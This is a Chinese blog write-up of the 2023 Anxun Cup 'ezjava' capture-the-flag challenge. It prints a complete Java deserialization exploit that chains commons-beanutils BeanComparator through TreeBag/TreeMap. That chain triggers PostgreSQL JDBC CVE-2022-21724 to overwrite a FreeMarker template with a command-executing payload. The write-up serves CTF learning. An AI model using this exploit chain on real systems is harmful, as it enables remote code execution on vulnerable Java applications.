2023安洵杯 ezjava

最新推荐文章于 2024-04-27 19:20:23 发布
最新推荐文章于 2024-04-27 19:20:23 发布
阅读量840 收藏 12
点赞数 15
分类专栏: Java安全 文章标签: web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/136796997
版权

2023安洵杯 ezjava

附件地址:https://github.com/D0g3-Lab/i-SOON_CTF_2023

先看依赖:

        <dependency>
            <groupId>org.postgresql</groupId>
            <artifactId>postgresql</artifactId>
            <version>42.3.1</version>
        </dependency>

        <dependency>
            <groupId>commons-beanutils</groupId>
            <artifactId>commons-beanutils</artifactId>
            <version>1.9.3</version>
        </dependency>

主要就是这两个依赖,有一个CB,和一个postgresql

在这里插入图片描述

postgresql可以看到有几个cve

最熟悉的就是cve202221724这个了

但是可以先看给的文件start.sh:

#!/bin/sh
echo $D0g3CTF > /flag
chmod 444 /flag
unset D0g3CTF
iptables -P INPUT ACCEPT
iptables -F
iptables -X
iptables -Z
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -m state --state NEW -j DROP
iptables -P OUTPUT DROP
iptables -n -L
java -jar /app/ezjava.jar

发现目标不出网,所以只能利用写文件的那个,刚好有一个ftl模板注入可以利用

在这里插入图片描述

payload如下:

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class cve202221724 {
    public static void main(String[] args) throws SQLException {
        String loggerLevel = "debug";
        String loggerFile = "test.txt";
        String shellContent="test";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
        Connection connection = DriverManager.getConnection(jdbcUrl);
    }
}

接下来就是CB了,CB可以触发任意的getter,链子如下:

在这里插入图片描述

但是注意到题目ban了很多类,具体如下:

   static {
      BLACKLIST.add("com.sun.jndi");
      BLACKLIST.add("com.fasterxml.jackson");
      BLACKLIST.add("org.springframework");
      BLACKLIST.add("com.sun.rowset.JdbcRowSetImpl");
      BLACKLIST.add("java.security.SignedObject");
      BLACKLIST.add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
      BLACKLIST.add("java.lang.Runtime");
      BLACKLIST.add("java.lang.ProcessBuilder");
      BLACKLIST.add("java.util.PriorityQueue");
   }

而且java的版本是openjdk:8u312​所以JNDI和RMI没辙,TemplatesImpl类和PriorityQueue类被禁

所以关键有两个点:

1.如何触发BeanComparator

2.如何触发getConnection

先来说第一个点

如何触发BeanComparator

这个是学了pop爷的链,只能说tql

入口是TreeBag类的readObject,其中有一个调用父类doReadObject的函数

在这里插入图片描述

跟进后触发了map.put

在这里插入图片描述

而TreeMap中有这个put函数,并且刚好触发compare:

在这里插入图片描述

在这里插入图片描述

这里的comparator也是Comparator​类,BeanComparator​是继承Comparator​类的,所以这里刚好接上了

getconnection可以写文件覆盖index.ftl利用模板注入rce

exp:

package com.ctf.axb;

import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.bag.TreeBag;
import org.postgresql.ds.PGConnectionPoolDataSource;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.TreeMap;

public class Exp {
    public static void main(String[] args) throws Exception {
        PGConnectionPoolDataSource pgConnectionPoolDataSource = new PGConnectionPoolDataSource();
        String loggerLevel = "debug";
        String loggerFile = "test.txt";
        String shellContent = "<#assign ac=springMacroRequestContext.webApplicationContext>\n"+"<#assign fc=ac.getBean('freeMarkerConfiguration')>\n"+"<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n"+"<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>/${\"freemarker.template.utility.Execute\"?new()(\"ls /\")}";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
        pgConnectionPoolDataSource.setProperty("loggerLevel","debug");
        pgConnectionPoolDataSource.setProperty("loggerFile","/app/templates/index.ftl");
        pgConnectionPoolDataSource.setURL(jdbcUrl);
        pgConnectionPoolDataSource.setProperty("user","<#assign ac=springMacroRequestContext.webApplicationContext>\n"+"<#assign fc=ac.getBean('freeMarkerConfiguration')>\n"+"<#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n"+"<#assign VOID=fc.setNewBuiltinClassResolver(dcr)>/${\"freemarker.template.utility.Execute\"?new()(\"ls /\")}");
        pgConnectionPoolDataSource.setProperty("password","1");

        Class<?> mutableIntegerclass = Class.forName("org.apache.commons.collections.bag.AbstractMapBag$MutableInteger");
        Constructor<?> mutableIntegerConstructor = mutableIntegerclass.getDeclaredConstructor(int.class);
        mutableIntegerConstructor.setAccessible(true);
        Object mutableIntegerClass = mutableIntegerConstructor.newInstance(1);
        Class<?> entry = Class.forName("java.util.TreeMap$Entry");
        Constructor<?> entryConstructor = entry.getDeclaredConstructor(Object.class, Object.class, entry);
        entryConstructor.setAccessible(true);
        Object entryClass = entryConstructor.newInstance(pgConnectionPoolDataSource, mutableIntegerClass, null);
        Object entryClass1 = entryConstructor.newInstance(pgConnectionPoolDataSource,mutableIntegerClass, entryClass);
        BeanComparator beanComparator = new BeanComparator();
        Class<? extends BeanComparator> beanComparatorClass = beanComparator.getClass();
        Field propertyField = beanComparatorClass.getDeclaredField("property");
        propertyField.setAccessible(true);
        propertyField.set(beanComparator,"connection");
        TreeMap treeMap = new TreeMap();

        setFieldValue(entryClass1, "right", entryClass);
        setFieldValue(treeMap,"root",entryClass1);
        setFieldValue(treeMap,"size",1);
        setFieldValue(treeMap,"modCount",1);
        setFieldValue(treeMap,"comparator",beanComparator);

        TreeBag treeBag = new TreeBag(beanComparator);
        Class<?> superclass = treeBag.getClass().getSuperclass();
        Field map = superclass.getDeclaredField("map");
        map.setAccessible(true);
        map.set(treeBag,treeMap);
        String s = base64serial(treeBag);
        System.out.println(s);
        base64deserial(s);
    }
    public static String base64serial(Object o) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();
        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
        return base64String;
    }

    public static void base64deserial(String base64String) throws Exception {
        byte[] data = Base64.getDecoder().decode(base64String);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
        ois.readObject();
    }

    public static void setFieldValue(Object object,String field_name,Object filed_value) throws NoSuchFieldException, IllegalAccessException {
        Class clazz=object.getClass();
        Field declaredField=clazz.getDeclaredField(field_name);
        declaredField.setAccessible(true);
        declaredField.set(object,filed_value);
    }
}

编码完直接打,就可以得到结果了

在这里插入图片描述

参考链接

https://xz.aliyun.com/t/11812

https://boogipop.com/2023/12/24/%E7%AC%AC%E5%85%AD%E5%B1%8A%E5%AE%89%E6%B4%B5%E6%9D%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8C%91%E6%88%98%E8%B5%9B%20Writeup/#ezjava

官方WP

清风--
关注
  • 15
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[JAVA全分享]从第二届网刃杯CTF题目学习JAVA SPEL表达式注入
GX233的博客
04-27 1920
SPEL注入
PolarCTF WEB题目 ezjava WP
weixin_62257805的博客
10-13 454
Polar CTF WEB题目之ezjava -SPEL注入wp
第十五届蓝桥杯网络全赛项 ezjava writeup
最新发布
weixin_45936149的博客
04-27 876
第15届蓝桥杯ezjava writeup
2019EIS-ezjava--fastjson-1.2.47-RCE
地址ch3nye.top
12-08 890
转载 https://github.com/CaijiOrz/fastjson-1.2.47-RCE/ fastjson-1.2.47-RCE Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法,以及避开坑点 以下操作均在Ubuntu 18下亲测可用,openjdk需要切换到8,且使用8的javac > java -version openjdk versin "1....
第十届南京邮电大学网络攻防大赛(NCTF 2021)writeup
渗透测试研究中心
12-22 9546
WebX1cT34m_API_SystemAuthor:wh1sper题目描述:在API全的新时代,全圈迎来风云变幻。掀起巨浪的你?只手遮天的你?选择保护还是放弃你的曾经的伙伴?target:http://129.211.173.64:58082/附件链接:https://wwn.lanzoui.com/iUoDwwyfdxchint1:the hidden API to bypass 4...
[祥云杯 2022]ezjava
Sentiment的博客
11-04 1029
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
ezjava.jar
03-03
ezjava.jar
Github:ez java学习
03-06
【标题】"Github: ez Java学习" 涵盖了初学者如何在GitHub上学习Java编程的基础知识。这个项目可能是为了帮助新手理解Java语言的基本概念和编程实践,同时利用GitHub作为学习和分享代码的平台。...
BugKu_ez_java_serialize
qq_53460654的博客
12-20 683
简单的一道java反序列化题
【BUGKU之ez_java_serialize】
qq_40646572的博客
04-12 5155
BUGKU之java反序列化练习
NSS [NUSTCTF 2022 新生赛]Ezjava1
Jay17的博客
08-30 818
NSS [NUSTCTF 2022 新生赛]Ezjava1
java 添加用户 数据库,跟屌丝学DB2 第二课 建立数据库以及添加用户
weixin_26705191的博客
03-10 519
装DB2 之后,就可以在 DB2 环境中创建自己的数据库。首先考虑数据库应该使用哪个实例。实例(instance) 提供一个由数据库管理配置(DBM CFG)文件控制的逻辑层,可以在这里将多个数据库分组在一起。DBM CFG 文件包含一组 DBM CFG 参数,可以使用它们对实例进行调优。在每个工作站上可以创建多个实例,在每个实例中可以创建多个数据库。屌丝学习当然要创建屌丝实例Windows先...
祥云杯2022 writeup
渗透测试研究中心
11-02 1926
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
【Polarctf】web ezjava
xsx213的博客
10-13 201
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
nepctf2023 部分web复现
weixin_63231007的博客
09-01 691
我们需要写一个plugin进去,但是不能直接写进去,因为plugin目录没权限写但是由于当前我们有root权限的数据库用户,我们可以使用select into dumpfile的形式写入:当以 root 用户身份执行 SELECT INTO DUMPFILE 查询时,它将绕过文件权限检查,并允许将查询结果写入任何有效的文件路径中,即使该路径对 mysql 用户是无法写入的。请注意,使用 root 用户执行此操作需要格外小心,因为它会绕过一些全限制。
【2022 DSCTF决赛wp】
qq_45603443的博客
08-04 877
2022 DSCTF决赛wp
祥云杯2022复现
your_friends的博客
11-13 1006
这个CVE的漏洞就是不需要公钥以及私钥就能构造出jwt的认证,稍作修改就可以更改:将里面的sub=bob改成is_admin=1然后拿出来输出一下。而我们点击页面的各种功能提示都是权限不够,那么这里也就是需要构造is_admin=1,在jwt这个版本更新之后,留下了检测是否存在漏洞的poc。苦于没有环境,我就只能口述了,利用graphql注入,注入出账号密码,最终登陆拿到flag。我这里只复现一下这个jwt伪造了,grahql只能纸上谈兵的看看了并不能实操。抓包的时候有一串jwt,解码出来之后可以看到。
Java响应式(反应式)编程——RxJava
OneFine的技术博客
03-21 9881
响应式编程是一种基于异步数据流概念的编程模式
2022鹏城杯web
m0_54849806的博客
07-28 1650
扫描后台发现存在.git,利用githack工具拿到.git文件夹,利用gitlog查看commitid,利用gitreset--hardbe50c81b903b0005d0740d221e74c51340251bc2进行恢复拿到源码。应该是需要删除掉网站根目录下的bocai.html、bocai.png,然后再来执行,不过暂时没有删除的权限,所以应该是需要提权了。那么我们可以直接覆盖一个php文件。可以将上传的文件写入,但是还要传个id,并且最终拼接成了路径是已存在的文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值